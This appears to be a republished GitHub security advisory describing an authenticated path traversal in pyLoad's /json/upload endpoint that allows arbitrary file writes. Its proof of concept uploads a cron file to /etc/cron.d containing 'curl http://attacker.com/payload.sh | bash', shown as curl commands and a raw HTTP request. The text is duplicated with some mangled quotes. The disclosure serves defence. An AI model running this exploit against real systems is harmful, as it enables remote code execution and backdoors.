Headline

GHSA-xqpg-92fq-grfg: `pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write

Summary

An authenticated path traversal vulnerability exists in the /json/upload endpoint of the pyLoad By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to:

Remote Code Execution (RCE)
Local Privilege Escalation
System-wide compromise
Persistence and backdoors

Vulnerable Code

File: src/pyload/webui/app/blueprints/json_blueprint.py

@json_blueprint.route("/upload", methods=["POST"])
def upload():
    dir_path = api.get_config_value("general", "storage_folder")
    for file in request.files.getlist("file"):
        file_path = os.path.join(dir_path, "tmp_" + file.filename)  
        file.save(file_path)

Issue: No sanitization or validation on file.filename, allowing traversal via ../../ sequences.

(Proof of Concept)

Clone and install pyLoad from source (pip install pyload-ng):

git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload

Or install via pip (PyPi) in virtualenv:

python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyload

Login and obtain session token

curl -c cookies.txt -X POST http://127.0.0.1:8000/login \
  -d "username=admin&password=admin"

Create malicious cron payload

echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit

Upload file with path traversal filename

curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \
  -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"

On the next cron tick, a reverse shell or payload will be triggered.

BurpSuite HTTP Request

POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--

7 hours ago

ghsa

Open in Source

#vulnerability #web #js #git #backdoor #rce #auth

Summary

An authenticated path traversal vulnerability exists in the /json/upload endpoint of the pyLoad By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to:

Remote Code Execution (RCE)
Local Privilege Escalation
System-wide compromise
Persistence and backdoors

Vulnerable Code

File: src/pyload/webui/app/blueprints/json_blueprint.py

@json_blueprint.route("/upload", methods=[“POST”]) def upload(): dir_path = api.get_config_value("general", “storage_folder”) for file in request.files.getlist(“file”): file_path = os.path.join(dir_path, “tmp_” + file.filename)
file.save(file_path)

Issue: No sanitization or validation on file.filename, allowing traversal via …/…/ sequences.

(Proof of Concept)

Clone and install pyLoad from source (pip install pyload-ng):

git clone https://github.com/pyload/pyload cd pyload git checkout 0.4.20 python -m pip install -e . pyload --userdir=/tmp/pyload

Or install via pip (PyPi) in virtualenv:

python -m venv pyload-env source pyload-env/bin/activate pip install pyload==0.4.20 pyload

Login and obtain session token

curl -c cookies.txt -X POST http://127.0.0.1:8000/login \ -d “username=admin&password=admin”

Create malicious cron payload

echo “*/1 * * * * root curl http://attacker.com/payload.sh | bash” > exploit

Upload file with path traversal filename

curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \ -F “file=@exploit;filename=…/…/…/…/etc/cron.d/pyload_backdoor”

On the next cron tick, a reverse shell or payload will be triggered.

BurpSuite HTTP Request

POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--

References

GHSA-xqpg-92fq-grfg
pyload/pyload@fc4b136
https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109

ghsa: Latest News

GHSA-xqpg-92fq-grfg: `pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write

7 hours ago

ghsa

GHSA-54vw-f4xf-f92j: HAX CMS application pages vulnerable to clickjacking

7 hours ago

ghsa

GHSA-gq96-8w38-hhj2: LibreNMS has Authenticated Local File Inclusion in ajax_form.php that Allows RCE

7 hours ago

ghsa

GHSA-5fpv-5qvh-7cf3: NodeJS version of the HAX CMS application is distributed with Default Secrets

8 hours ago

ghsa

GHSA-pjj3-j5j6-qj27: HAX CMS NodeJS Application Has Improper Error Handling That Leads to Denial of Service

8 hours ago

ghsa